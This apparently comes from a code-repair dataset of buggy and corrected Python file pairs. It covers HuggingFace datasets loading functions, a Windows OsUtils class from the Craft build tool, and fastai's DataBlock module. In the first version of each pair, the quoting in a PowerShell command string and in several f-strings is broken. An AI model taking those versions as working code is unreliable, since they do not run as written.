logger.info("Updating dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
else:
logger.info("Found dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
# Record metadata associating original dataset path with local unique folder
meta_path = local_file_path.split(".py")[0] + ".json"
if not os.path.exists(meta_path):
logger.info(f"Creating metadata file for {module_type} {file_path} at {meta_path}")
meta = {"original file path": file_path, "local file path": local_file_path}
# the filename is *.py in our case, so better rename to filenam.json instead of filename.py.json
with open(meta_path, "w", encoding="utf-8") as meta_file:
json.dump(meta, meta_file)
else:
logger.info(f"Found metadata file for {module_type} {file_path} at {meta_path}")
# Copy all the additional imports
for import_name, import_path in local_imports:
if os.path.isfile(import_path):
full_path_local_import = os.path.join(hash_folder_path, import_name + ".py")
if not os.path.exists(full_path_local_import):
logger.info("Copying local import file from %s at %s", import_path, full_path_local_import)
shutil.copyfile(import_path, full_path_local_import)
else:
logger.info("Found local import file from %s at %s", import_path, full_path_local_import)
elif os.path.isdir(import_path):
full_path_local_import = os.path.join(hash_folder_path, import_name)
if not os.path.exists(full_path_local_import):
logger.info("Copying local import directory from %s at %s", import_path, full_path_local_import)
shutil.copytree(import_path, full_path_local_import)
else:
logger.info("Found local import directory from %s at %s", import_path, full_path_local_import)
else:
raise OSError(f"Error with local import at {import_path}")
if force_local_path is None:
module_path = ".".join(
[datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
)
else:
module_path = local_file_path
# make the new module to be noticed by the import system
importlib.invalidate_caches()
if return_resolved_file_path:
return module_path, hash, file_path
return module_path, hash
def load_metric(
path: str,
config_name: Optional[str] = None,
process_id: int = 0,
num_process: int = 1,
cache_dir: Optional[str] = None,
experiment_id: Optional[str] = None,
keep_in_memory: bool = False,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
script_version: Optional[Union[str, Version]] = None,
**metric_init_kwargs,
) -> Metric:
r"""Load a `datasets.Metric`.
Args:
path (``str``):
path to the metric processing script with the metric builder. Can be either:
- a local path to processing script or the directory containing the script (if the script has the same name as the directory),
e.g. ``'./metrics/rouge'`` or ``'./metrics/rogue/rouge.py'``
- a metric identifier on the HuggingFace datasets repo (list all available metrics with ``datasets.list_metrics()``)
e.g. ``'rouge'`` or ``'bleu'``
config_name (Optional ``str``): selecting a configuration for the metric (e.g. the GLUE metric has a configuration for each subset)
process_id (Optional ``int``): for distributed evaluation: id of the process
num_process (Optional ``int``): for distributed evaluation: total number of processes
cache_dir (Optional str): path to store the temporary predictions and references (default to `~/.cache/metrics/`)
experiment_id (``str``): A specific experiment id. This is used if several distributed evaluations share the same file system.
This is useful to compute metrics in distributed setups (in particular non-additive metrics like F1).
keep_in_memory (bool): Whether to store the temporary results in memory (defaults to False)
download_config (Optional ``datasets.DownloadConfig``: specific download configuration parameters.
download_mode (Optional `datasets.GenerateMode`): select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
script_version (Optional ``Union[str, datasets.Version]``): if specified, the module will be loaded from the datasets repository
at this version. By default it is set to the local version fo the lib. Specifying a version that is different from
your local version of the lib might cause compatibility issues.
Returns:
`datasets.Metric`
"""
module_path, hash = prepare_module(
path,
script_version=script_version,
download_config=download_config,
download_mode=download_mode,
dataset=False,
)
metric_cls = import_main_class(module_path, dataset=False)
metric = metric_cls(
config_name=config_name,
process_id=process_id,
num_process=num_process,
cache_dir=cache_dir,
keep_in_memory=keep_in_memory,
experiment_id=experiment_id,
**metric_init_kwargs,
)
# Download and prepare resources for the metric
metric.download_and_prepare(download_config=download_config)
return metric
def load_dataset(
path: str,
name: Optional[str] = None,
data_dir: Optional[str] = None,
data_files: Union[Dict, List] = None,
split: Optional[Union[str, Split]] = None,
cache_dir: Optional[str] = None,
features: Optional[Features] = None,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
ignore_verifications: bool = False,
keep_in_memory: Optional[bool] = None,
save_infos: bool = False,
script_version: Optional[Union[str, Version]] = None,
use_auth_token: Optional[Union[bool, str]] = None,
task: Optional[Union[str, TaskTemplate]] = None,
streaming: bool = False,
**config_kwargs,
) -> Union[DatasetDict, Dataset, IterableDatasetDict, IterableDataset]:
"""Load a dataset.
This method does the following under the hood:
1. Download and import in the library the dataset loading script from ``path`` if it's not already cached inside the library.
Processing scripts are small python scripts that define the citation, info and format of the dataset,
contain the URL to the original data files and the code to load examples from the original data files.
You can find some of the scripts here: https://github.com/huggingface/datasets/datasets
and easily upload yours to share them using the CLI ``huggingface-cli``.
You can find the complete list of datasets in the Datasets Hub at https://huggingface.co/datasets
2. Run the dataset loading script which will:
* Download the dataset file from the original URL (see the script) if it's not already downloaded and cached.
* Process and cache the dataset in typed Arrow tables for caching.
Arrow table are arbitrarily long, typed tables which can store nested objects and be mapped to numpy/pandas/python standard types.
They can be directly access from drive, loaded in RAM or even streamed over the web.
3. Return a dataset built from the requested splits in ``split`` (default: all).
Args:
path (:obj:`str`): Path to the dataset processing script with the dataset builder. Can be either:
- a local path to processing script or the directory containing the script (if the script has the same name as the directory),
e.g. ``'./dataset/squad'`` or ``'./dataset/squad/squad.py'``.
- a dataset identifier in the HuggingFace Datasets Hub (list all available datasets and ids with ``datasets.list_datasets()``)
e.g. ``'squad'``, ``'glue'`` or ``'openai/webtext'``.
name (:obj:`str`, optional): Defining the name of the dataset configuration.
data_files (:obj:`str`, optional): Defining the data_files of the dataset configuration.
data_dir (:obj:`str`, optional): Defining the data_dir of the dataset configuration.
split (:class:`Split` or :obj:`str`): Which split of the data to load.
If None, will return a `dict` with all splits (typically `datasets.Split.TRAIN` and `datasets.Split.TEST`).
If given, will return a single Dataset.
Splits can be combined and specified like in tensorflow-datasets.
cache_dir (:obj:`str`, optional): Directory to read/write data. Defaults to "~/datasets".
features (:class:`Features`, optional): Set the features type to use for this dataset.
download_config (:class:`~utils.DownloadConfig`, optional): Specific download configuration parameters.
download_mode (:class:`GenerateMode`, optional): Select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
ignore_verifications (:obj:`bool`, default ``False``): Ignore the verifications of the downloaded/processed dataset information (checksums/size/splits/...).
keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.
save_infos (:obj:`bool`, default ``False``): Save the dataset information (checksums/size/splits/...).
script_version (:class:`~utils.Version` or :obj:`str`, optional): Version of the dataset script to load:
- For canonical datasets in the `huggingface/datasets` library like "squad", the default version of the module is the local version fo the lib.
You can specify a different version from your local version of the lib (e.g. "master" or "1.2.0") but it might cause compatibility issues.
- For community provided datasets like "lhoestq/squad" that have their own git repository on the Datasets Hub, the default version "main" corresponds to the "main" branch.
You can specify a different version that the default "main" by using a commit sha or a git tag of the dataset repository.
use_auth_token (``str`` or ``bool``, optional): Optional string or boolean to use as Bearer token for remote files on the Datasets Hub.
If True, will get token from `"~/.huggingface"`.
task (``str``): The task to prepare the dataset for during training and evaluation. Casts the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`.
streaming (``bool``, default ``False``): If set to True, don't download the data files. Instead, it streams the data progressively while
iterating on the dataset. An IterableDataset or IterableDatasetDict is returned instead in this case.
Note that streaming works for datasets that use data formats that support being iterated over like txt, csv, jsonl for example.
Json files may be downloaded completely. Also streaming from remote zip or gzip files is supported but other compressed formats
like rar and xz are not yet supported. The tgz format doesn't allow streaming.
**config_kwargs: Keyword arguments to be passed to the :class:`BuilderConfig` and used in the :class:`DatasetBuilder`.
Returns:
:class:`Dataset` or :class:`DatasetDict`:
if `split` is not None: the dataset requested,
if `split` is None, a ``datasets.DatasetDict`` with each split.
or :class:`IterableDataset` or :class:`IterableDatasetDict` if streaming=True:
if `split` is not None: the dataset requested,
if `split` is None, a ``datasets.streaming.IterableDatasetDict`` with each split.
"""
ignore_verifications = ignore_verifications or save_infos
# Check streaming
if streaming:
if not config.AIOHTTP_AVAILABLE:
raise ImportError(
f"To be able to use dataset streaming, you need to install dependencies like aiohttp "
f"using 'pip install datasets[streaming]' or 'pip install aiohttp' for instance"
)
# Download/copy dataset processing script
module_path, hash, resolved_file_path = prepare_module(
path,
script_version=script_version,
download_config=download_config,
download_mode=download_mode,
dataset=True,
return_resolved_file_path=True,
use_auth_token=use_auth_token,
)
# Set the base path for downloads as the parent of the script location
if resolved_file_path is not None:
base_path = url_or_path_parent(resolved_file_path)
else:
base_path = None
# Get dataset builder class from the processing script
builder_cls = import_main_class(module_path, dataset=True)
# Instantiate the dataset builder
builder_instance: DatasetBuilder = builder_cls(
cache_dir=cache_dir,
name=name,
data_dir=data_dir,
data_files=data_files,
hash=hash,
features=features,
**config_kwargs,
)
# Retturn iterable dataset in case of streaming
if streaming:
# this extends the open and os.path.join functions for data streaming
extend_module_for_streaming(module_path, use_auth_token=use_auth_token)
return builder_instance.as_streaming_dataset(
split=split,
base_path=base_path,
use_auth_token=use_auth_token,
)
# Some datasets are already processed on the HF google storage
# Don't try downloading from google storage for the packaged datasets as text, json, csv or pandas
try_from_hf_gcs = path not in _PACKAGED_DATASETS_MODULES
# Download and prepare data
builder_instance.download_and_prepare(
download_config=download_config,
download_mode=download_mode,
ignore_verifications=ignore_verifications,
try_from_hf_gcs=try_from_hf_gcs,
base_path=base_path,
use_auth_token=use_auth_token,
)
# Build dataset for splits
keep_in_memory = (
keep_in_memory if keep_in_memory is not None else is_small_dataset(builder_instance.info.dataset_size)
)
ds = builder_instance.as_dataset(split=split, ignore_verifications=ignore_verifications, in_memory=keep_in_memory)
# Rename and cast features to match task schema
if task is not None:
ds = ds.prepare_for_task(task)
if save_infos:
builder_instance._save_infos()
return ds
def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> Union[Dataset, DatasetDict]:
"""
Loads a dataset that was previously saved using ``dataset.save_to_disk(dataset_path)`` from a dataset directory, or from a filesystem using either :class:`datasets.filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``.
Args:
dataset_path (:obj:`str`): Path (e.g. ``"dataset/train"``) or remote uri (e.g.
``"s3://my-bucket/dataset/train"``) of the Dataset or DatasetDict directory where the dataset will be
loaded from.
fs (:class:`~filesystems.S3FileSystem` or ``fsspec.spec.AbstractFileSystem``, optional, default ``None``):
Instance of of the remote filesystem used to download the files from.
keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.
Returns:
``datasets.Dataset`` or ``datasets.DatasetDict``
if `dataset_path` is a path of a dataset directory: the dataset requested,
if `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split.
keep_in_memory (``bool``, default False): Whether to copy the data in-memory.
"""
# gets filesystem from dataset, either s3:// or file:// and adjusted dataset_path
if is_remote_filesystem(fs):
dest_dataset_path = extract_path_from_uri(dataset_path)
else:
fs = fsspec.filesystem("file")
dest_dataset_path = dataset_path
if not fs.exists(dest_dataset_path):
raise FileNotFoundError("Directory {} not found".format(dataset_path))
if fs.isfile(Path(dest_dataset_path, config.DATASET_INFO_FILENAME).as_posix()):
return Dataset.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
elif fs.isfile(Path(dest_dataset_path, config.DATASETDICT_JSON_FILENAME).as_posix()):
return DatasetDict.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
else:
raise FileNotFoundError(
"Directory {} is neither a dataset directory nor a dataset dict directory.".format(dataset_path)
)
|
import tempfile
import ctypes
import os
import platform
import subprocess
import CraftOS.OsUtilsBase
from CraftCore import CraftCore
class FileAttributes():
# https://msdn.microsoft.com/en-us/library/windows/desktop/gg258117(v=vs.85).aspx
FILE_ATTRIBUTE_READONLY = 0x1
FILE_ATTRIBUTE_REPARSE_POINT = 0x400
class OsUtils(CraftOS.OsUtilsBase.OsUtilsBase):
@staticmethod
def rm(path, force=False):
CraftCore.log.debug("deleting file %s" % path)
if force:
OsUtils.removeReadOnlyAttribute(path)
return ctypes.windll.kernel32.DeleteFileW(path) != 0
@staticmethod
def rmDir(path, force=False):
CraftCore.log.debug("deleting directory %s" % path)
if force:
OsUtils.removeReadOnlyAttribute(path)
return ctypes.windll.kernel32.RemoveDirectoryW(path) != 0
@staticmethod
def isLink(path):
return os.path.islink(path) \
| OsUtils.getFileAttributes(path) & FileAttributes.FILE_ATTRIBUTE_REPARSE_POINT # Detect a Junction
@staticmethod
def getFileAttributes(path):
return ctypes.windll.kernel32.GetFileAttributesW(path)
@staticmethod
def removeReadOnlyAttribute(path):
attributes = OsUtils.getFileAttributes(path)
return ctypes.windll.kernel32.SetFileAttributesW(path,
attributes & ~ FileAttributes.FILE_ATTRIBUTE_READONLY) != 0
@staticmethod
def setConsoleTitle(title):
return ctypes.windll.kernel32.SetConsoleTitleW(title) != 0
@staticmethod
def supportsSymlinks():
with tempfile.TemporaryDirectory() as tmp:
testFile = os.path.join(tmp, "CRAFT_LINK_TEST")
return CraftCore.cache.getCommandOutput(f"cmd", f"/C mklink {testFile} {__file__}", testName="CRAFT_LINK_TEST")[0] == 0
@staticmethod
def toNativePath(path : str) -> str:
return OsUtils.toWindowsPath(path)
@staticmethod
def enableAnsiColors():
# tell Windows 10 that we do ansi
ctypes.windll.kernel32.SetConsoleMode(ctypes.windll.kernel32.GetStdHandle(-11), 7)
@staticmethod
def killProcess(name : str="*", prefix : str=None) -> bool:
if not prefix:
prefix = CraftCore.standardDirs.craftRoot()
powershell = CraftCore.cache.findApplication("powershell")
if not powershell:
CraftCore.log.warning("Failed to detect powershell")
return False
out = subprocess.run(f"{powershell} -NoProfile -ExecutionPolicy ByPass -Command \"& {{" +
f"Get-Process '{name}" | Where-Object {{$_.Path -like "{prefix}*'}} | Stop-Process}}\"", shell=True, stderr=subprocess.STDOUT)
CraftCore.log.debug(f"killProcess {out.args}: {out.stdout} {out.returncode}")
return out.returncode == 0
| import tempfile
import ctypes
import os
import platform
import subprocess
import CraftOS.OsUtilsBase
from CraftCore import CraftCore
class FileAttributes():
# https://msdn.microsoft.com/en-us/library/windows/desktop/gg258117(v=vs.85).aspx
FILE_ATTRIBUTE_READONLY = 0x1
FILE_ATTRIBUTE_REPARSE_POINT = 0x400
class OsUtils(CraftOS.OsUtilsBase.OsUtilsBase):
@staticmethod
def rm(path, force=False):
CraftCore.log.debug("deleting file %s" % path)
if force:
OsUtils.removeReadOnlyAttribute(path)
return ctypes.windll.kernel32.DeleteFileW(path) != 0
@staticmethod
def rmDir(path, force=False):
CraftCore.log.debug("deleting directory %s" % path)
if force:
OsUtils.removeReadOnlyAttribute(path)
return ctypes.windll.kernel32.RemoveDirectoryW(path) != 0
@staticmethod
def isLink(path):
return os.path.islink(path) \
| OsUtils.getFileAttributes(path) & FileAttributes.FILE_ATTRIBUTE_REPARSE_POINT # Detect a Junction
@staticmethod
def getFileAttributes(path):
return ctypes.windll.kernel32.GetFileAttributesW(path)
@staticmethod
def removeReadOnlyAttribute(path):
attributes = OsUtils.getFileAttributes(path)
return ctypes.windll.kernel32.SetFileAttributesW(path,
attributes & ~ FileAttributes.FILE_ATTRIBUTE_READONLY) != 0
@staticmethod
def setConsoleTitle(title):
return ctypes.windll.kernel32.SetConsoleTitleW(title) != 0
@staticmethod
def supportsSymlinks():
with tempfile.TemporaryDirectory() as tmp:
testFile = os.path.join(tmp, "CRAFT_LINK_TEST")
return CraftCore.cache.getCommandOutput(f"cmd", f"/C mklink {testFile} {__file__}", testName="CRAFT_LINK_TEST")[0] == 0
@staticmethod
def toNativePath(path : str) -> str:
return OsUtils.toWindowsPath(path)
@staticmethod
def enableAnsiColors():
# tell Windows 10 that we do ansi
ctypes.windll.kernel32.SetConsoleMode(ctypes.windll.kernel32.GetStdHandle(-11), 7)
@staticmethod
def killProcess(name : str="*", prefix : str=None) -> bool:
if not prefix:
prefix = CraftCore.standardDirs.craftRoot()
powershell = CraftCore.cache.findApplication("powershell")
if not powershell:
CraftCore.log.warning("Failed to detect powershell")
return False
out = subprocess.run(f"{powershell} -NoProfile -ExecutionPolicy ByPass -Command \"& {{" +
f"Get-Process '{name}' | Where-Object {{$_.Path -like '{prefix}*'}} | Stop-Process}}\"", shell=True, stderr=subprocess.STDOUT)
CraftCore.log.debug(f"killProcess {out.args}: {out.stdout} {out.returncode}")
return out.returncode == 0
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/06_data.block.ipynb (unless otherwise specified).
__all__ = ['TransformBlock', 'CategoryBlock', 'MultiCategoryBlock', 'RegressionBlock', 'DataBlock']
# Cell
from ..torch_basics import *
from .core import *
from .load import *
from .external import *
from .transforms import *
# Cell
class TransformBlock():
"A basic wrapper that links defaults transforms for the data block API"
def __init__(self, type_tfms=None, item_tfms=None, batch_tfms=None, dl_type=None, dls_kwargs=None):
self.type_tfms = L(type_tfms)
self.item_tfms = ToTensor + L(item_tfms)
self.batch_tfms = L(batch_tfms)
self.dl_type,self.dls_kwargs = dl_type,({} if dls_kwargs is None else dls_kwargs)
# Cell
def CategoryBlock(vocab=None, add_na=False):
"`TransformBlock` for single-label categorical targets"
return TransformBlock(type_tfms=Categorize(vocab=vocab, add_na=add_na))
# Cell
def MultiCategoryBlock(encoded=False, vocab=None, add_na=False):
"`TransformBlock` for multi-label categorical targets"
tfm = EncodedMultiCategorize(vocab=vocab) if encoded else [MultiCategorize(vocab=vocab, add_na=add_na), OneHotEncode]
return TransformBlock(type_tfms=tfm)
# Cell
def RegressionBlock(c_out=None):
"`TransformBlock` for float targets"
return TransformBlock(type_tfms=RegressionSetup(c_out))
# Cell
from inspect import isfunction,ismethod
# Cell
def _merge_tfms(*tfms):
"Group the `tfms` in a single list, removing duplicates (from the same class) and instantiating"
g = groupby(concat(*tfms), lambda o:
o if isinstance(o, type) else o.__qualname__ if (isfunction(o) or ismethod(o)) else o.__class__)
return L(v[-1] for k,v in g.items()).map(instantiate)
def _zip(x): return L(x).zip()
# Cell
@docs
@funcs_kwargs
class DataBlock():
"Generic container to quickly build `Datasets` and `DataLoaders`"
get_x=get_items=splitter=get_y = None
blocks,dl_type = (TransformBlock,TransformBlock),TfmdDL
_methods = 'get_items splitter get_y get_x'.split()
def __init__(self, blocks=None, dl_type=None, getters=None, n_inp=None, item_tfms=None, batch_tfms=None, **kwargs):
blocks = L(self.blocks if blocks is None else blocks)
blocks = L(b() if callable(b) else b for b in blocks)
self.type_tfms = blocks.attrgot('type_tfms', L())
self.default_item_tfms = _merge_tfms(*blocks.attrgot('item_tfms', L()))
self.default_batch_tfms = _merge_tfms(*blocks.attrgot('batch_tfms', L()))
for t in blocks: self.dl_type = getattr(t, 'dl_type', self.dl_type)
self.dataloaders = delegates(self.dl_type.__init__)(self.dataloaders)
self.dls_kwargs = merge(*blocks.attrgot('dls_kwargs', {}))
self.getters = [noop] * len(self.type_tfms) if getters is None else getters
if self.get_x: self.getters[0] = self.get_x
if self.get_y: self.getters[1] = self.get_y
self.n_inp = n_inp
if kwargs: raise TypeError(f'invalid keyword arguments: {', '.join(kwargs.keys())}')
self.new(item_tfms, batch_tfms)
def _combine_type_tfms(self): return L([self.getters, self.type_tfms]).map_zip(lambda g,tt: L(g) + tt)
def new(self, item_tfms=None, batch_tfms=None):
self.item_tfms = _merge_tfms(self.default_item_tfms, item_tfms)
self.batch_tfms = _merge_tfms(self.default_batch_tfms, batch_tfms)
return self
@classmethod
def from_columns(cls, blocks=None, getters=None, get_items=None, **kwargs):
if getters is None: getters = L(itemgetter(i) for i in range(2 if blocks is None else len(L(blocks))))
get_items = _zip if get_items is None else compose(get_items, _zip)
return cls(blocks=blocks, getters=getters, get_items=get_items, **kwargs)
def datasets(self, source, verbose=False):
self.source = source ; pv(f"Collecting items from {source}", verbose)
items = (self.get_items or noop)(source) ; pv(f"Found {len(items)} items", verbose)
splits = (self.splitter or RandomSplitter())(items)
pv(f"{len(splits)} datasets of sizes {",".join([str(len(s)) for s in splits])}", verbose)
return Datasets(items, tfms=self._combine_type_tfms(), splits=splits, dl_type=self.dl_type, n_inp=self.n_inp, verbose=verbose)
def dataloaders(self, source, path='.', verbose=False, **kwargs):
dsets = self.datasets(source)
kwargs = {**self.dls_kwargs, **kwargs, 'verbose': verbose}
return dsets.dataloaders(path=path, after_item=self.item_tfms, after_batch=self.batch_tfms, **kwargs)
_docs = dict(new="Create a new `DataBlock` with other `item_tfms` and `batch_tfms`",
datasets="Create a `Datasets` object from `source`",
dataloaders="Create a `DataLoaders` object from `source`")
# Cell
def _short_repr(x):
if isinstance(x, tuple): return f'({', '.join([_short_repr(y) for y in x])})'
if isinstance(x, list): return f'[{', '.join([_short_repr(y) for y in x])}]'
if not isinstance(x, Tensor): return str(x)
if x.numel() <= 20 and x.ndim <=1: return str(x)
return f'{x.__class__.__name__} of size {'x'.join([str(d) for d in x.shape])}'
# Cell
def _apply_pipeline(p, x):
print(f" {p}\n starting from\n {_short_repr(x)}")
for f in p.fs:
name = f.name
try:
x = f(x)
if name != "noop": print(f" applying {name} gives\n {_short_repr(x)}")
except Exception as e:
print(f" applying {name} failed.")
raise e
return x
# Cell
from .load import _collate_types
def _find_fail_collate(s):
s = L(*s)
for x in s[0]:
if not isinstance(x, _collate_types): return f"{type(x).__name__} is not collatable"
for i in range_of(s[0]):
try: _ = default_collate(s.itemgot(i))
except:
shapes = [getattr(o[i], 'shape', None) for o in s]
return f"Could not collate the {i}-th members of your tuples because got the following shapes\n{",".join([str(s) for s in shapes])}"
# Cell
@patch
def summary(self: DataBlock, source, bs=4, **kwargs):
print(f"Setting-up type transforms pipelines")
dsets = self.datasets(source, verbose=True)
print("\nBuilding one sample")
for tl in dsets.train.tls: _apply_pipeline(tl.tfms, dsets.train.items[0])
print(f"\nFinal sample: {dsets.train[0]}\n\n")
dls = self.dataloaders(source, verbose=True)
print("\nBuilding one batch")
if len([f for f in dls.train.after_item.fs if f.name != 'noop'])!=0:
print("Applying item_tfms to the first sample:")
s = [_apply_pipeline(dls.train.after_item, dsets.train[0])]
print(f"\nAdding the next {bs-1} samples")
s += [dls.train.after_item(dsets.train[i]) for i in range(1, bs)]
else:
print("No item_tfms to apply")
s = [dls.train.after_item(dsets.train[i]) for i in range(bs)]
if len([f for f in dls.train.before_batch.fs if f.name != 'noop'])!=0:
print("\nApplying before_batch to the list of samples")
s = _apply_pipeline(dls.train.before_batch, s)
else: print("\nNo before_batch transform to apply")
print("\nCollating items in a batch")
try:
b = dls.train.create_batch(s)
b = retain_types(b, s[0] if is_listy(s) else s)
except Exception as e:
print("Error! It's not possible to collate your items in a batch")
why = _find_fail_collate(s)
print("Make sure all parts of your samples are tensors of the same size" if why is None else why)
raise e
if len([f for f in dls.train.after_batch.fs if f.name != 'noop'])!=0:
print("\nApplying batch_tfms to the batch built")
b = _apply_pipeline(dls.train.after_batch, b)
else: print("\nNo batch_tfms to apply") | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/06_data.block.ipynb (unless otherwise specified).
__all__ = ['TransformBlock', 'CategoryBlock', 'MultiCategoryBlock', 'RegressionBlock', 'DataBlock']
# Cell
from ..torch_basics import *
from .core import *
from .load import *
from .external import *
from .transforms import *
# Cell
class TransformBlock():
"A basic wrapper that links defaults transforms for the data block API"
def __init__(self, type_tfms=None, item_tfms=None, batch_tfms=None, dl_type=None, dls_kwargs=None):
self.type_tfms = L(type_tfms)
self.item_tfms = ToTensor + L(item_tfms)
self.batch_tfms = L(batch_tfms)
self.dl_type,self.dls_kwargs = dl_type,({} if dls_kwargs is None else dls_kwargs)
# Cell
def CategoryBlock(vocab=None, add_na=False):
"`TransformBlock` for single-label categorical targets"
return TransformBlock(type_tfms=Categorize(vocab=vocab, add_na=add_na))
# Cell
def MultiCategoryBlock(encoded=False, vocab=None, add_na=False):
"`TransformBlock` for multi-label categorical targets"
tfm = EncodedMultiCategorize(vocab=vocab) if encoded else [MultiCategorize(vocab=vocab, add_na=add_na), OneHotEncode]
return TransformBlock(type_tfms=tfm)
# Cell
def RegressionBlock(c_out=None):
"`TransformBlock` for float targets"
return TransformBlock(type_tfms=RegressionSetup(c_out))
# Cell
from inspect import isfunction,ismethod
# Cell
def _merge_tfms(*tfms):
"Group the `tfms` in a single list, removing duplicates (from the same class) and instantiating"
g = groupby(concat(*tfms), lambda o:
o if isinstance(o, type) else o.__qualname__ if (isfunction(o) or ismethod(o)) else o.__class__)
return L(v[-1] for k,v in g.items()).map(instantiate)
def _zip(x): return L(x).zip()
# Cell
@docs
@funcs_kwargs
class DataBlock():
"Generic container to quickly build `Datasets` and `DataLoaders`"
get_x=get_items=splitter=get_y = None
blocks,dl_type = (TransformBlock,TransformBlock),TfmdDL
_methods = 'get_items splitter get_y get_x'.split()
def __init__(self, blocks=None, dl_type=None, getters=None, n_inp=None, item_tfms=None, batch_tfms=None, **kwargs):
blocks = L(self.blocks if blocks is None else blocks)
blocks = L(b() if callable(b) else b for b in blocks)
self.type_tfms = blocks.attrgot('type_tfms', L())
self.default_item_tfms = _merge_tfms(*blocks.attrgot('item_tfms', L()))
self.default_batch_tfms = _merge_tfms(*blocks.attrgot('batch_tfms', L()))
for t in blocks: self.dl_type = getattr(t, 'dl_type', self.dl_type)
self.dataloaders = delegates(self.dl_type.__init__)(self.dataloaders)
self.dls_kwargs = merge(*blocks.attrgot('dls_kwargs', {}))
self.getters = [noop] * len(self.type_tfms) if getters is None else getters
if self.get_x: self.getters[0] = self.get_x
if self.get_y: self.getters[1] = self.get_y
self.n_inp = n_inp
if kwargs: raise TypeError(f'invalid keyword arguments: {", ".join(kwargs.keys())}')
self.new(item_tfms, batch_tfms)
def _combine_type_tfms(self): return L([self.getters, self.type_tfms]).map_zip(lambda g,tt: L(g) + tt)
def new(self, item_tfms=None, batch_tfms=None):
self.item_tfms = _merge_tfms(self.default_item_tfms, item_tfms)
self.batch_tfms = _merge_tfms(self.default_batch_tfms, batch_tfms)
return self
@classmethod
def from_columns(cls, blocks=None, getters=None, get_items=None, **kwargs):
if getters is None: getters = L(itemgetter(i) for i in range(2 if blocks is None else len(L(blocks))))
get_items = _zip if get_items is None else compose(get_items, _zip)
return cls(blocks=blocks, getters=getters, get_items=get_items, **kwargs)
def datasets(self, source, verbose=False):
self.source = source ; pv(f"Collecting items from {source}", verbose)
items = (self.get_items or noop)(source) ; pv(f"Found {len(items)} items", verbose)
splits = (self.splitter or RandomSplitter())(items)
pv(f"{len(splits)} datasets of sizes {','.join([str(len(s)) for s in splits])}", verbose)
return Datasets(items, tfms=self._combine_type_tfms(), splits=splits, dl_type=self.dl_type, n_inp=self.n_inp, verbose=verbose)
def dataloaders(self, source, path='.', verbose=False, **kwargs):
dsets = self.datasets(source)
kwargs = {**self.dls_kwargs, **kwargs, 'verbose': verbose}
return dsets.dataloaders(path=path, after_item=self.item_tfms, after_batch=self.batch_tfms, **kwargs)
_docs = dict(new="Create a new `DataBlock` with other `item_tfms` and `batch_tfms`",
datasets="Create a `Datasets` object from `source`",
dataloaders="Create a `DataLoaders` object from `source`")
# Cell
def _short_repr(x):
if isinstance(x, tuple): return f'({", ".join([_short_repr(y) for y in x])})'
if isinstance(x, list): return f'[{", ".join([_short_repr(y) for y in x])}]'
if not isinstance(x, Tensor): return str(x)
if x.numel() <= 20 and x.ndim <=1: return str(x)
return f'{x.__class__.__name__} of size {"x".join([str(d) for d in x.shape])}'
# Cell
def _apply_pipeline(p, x):
print(f" {p}\n starting from\n {_short_repr(x)}")
for f in p.fs:
name = f.name
try:
x = f(x)
if name != "noop": print(f" applying {name} gives\n {_short_repr(x)}")
except Exception as e:
print(f" applying {name} failed.")
raise e
return x
# Cell
from .load import _collate_types
def _find_fail_collate(s):
s = L(*s)
for x in s[0]:
if not isinstance(x, _collate_types): return f"{type(x).__name__} is not collatable"
for i in range_of(s[0]):
try: _ = default_collate(s.itemgot(i))
except:
shapes = [getattr(o[i], 'shape', None) for o in s]
return f"Could not collate the {i}-th members of your tuples because got the following shapes\n{','.join([str(s) for s in shapes])}"
# Cell
@patch
def summary(self: DataBlock, source, bs=4, **kwargs):
print(f"Setting-up type transforms pipelines")
dsets = self.datasets(source, verbose=True)
print("\nBuilding one sample")
for tl in dsets.train.tls: _apply_pipeline(tl.tfms, dsets.train.items[0])
print(f"\nFinal sample: {dsets.train[0]}\n\n")
dls = self.dataloaders(source, verbose=True)
print("\nBuilding one batch")
if len([f for f in dls.train.after_item.fs if f.name != 'noop'])!=0:
print("Applying item_tfms to the first sample:")
s = [_apply_pipeline(dls.train.after_item, dsets.train[0])]
print(f"\nAdding the next {bs-1} samples")
s += [dls.train.after_item(dsets.train[i]) for i in range(1, bs)]
else:
print("No item_tfms to apply")
s = [dls.train.after_item(dsets.train[i]) for i in range(bs)]
if len([f for f in dls.train.before_batch.fs if f.name != 'noop'])!=0:
print("\nApplying before_batch to the list of samples")
s = _apply_pipeline(dls.train.before_batch, s)
else: print("\nNo before_batch transform to apply")
print("\nCollating items in a batch")
try:
b = dls.train.create_batch(s)
b = retain_types(b, s[0] if is_listy(s) else s)
except Exception as e:
print("Error! It's not possible to collate your items in a batch")
why = _find_fail_collate(s)
print("Make sure all parts of your samples are tensors of the same size" if why is None else why)
raise e
if len([f for f in dls.train.after_batch.fs if f.name != 'noop'])!=0:
print("\nApplying batch_tfms to the batch built")
b = _apply_pipeline(dls.train.after_batch, b)
else: print("\nNo batch_tfms to apply") |
from json import dump, load
from pathlib import Path
from copy import copy as c
from collections import defaultdict
from logging import getLogger
from datetime import date, datetime
from shutil import copy, rmtree
from bidso.utils import replace_extension
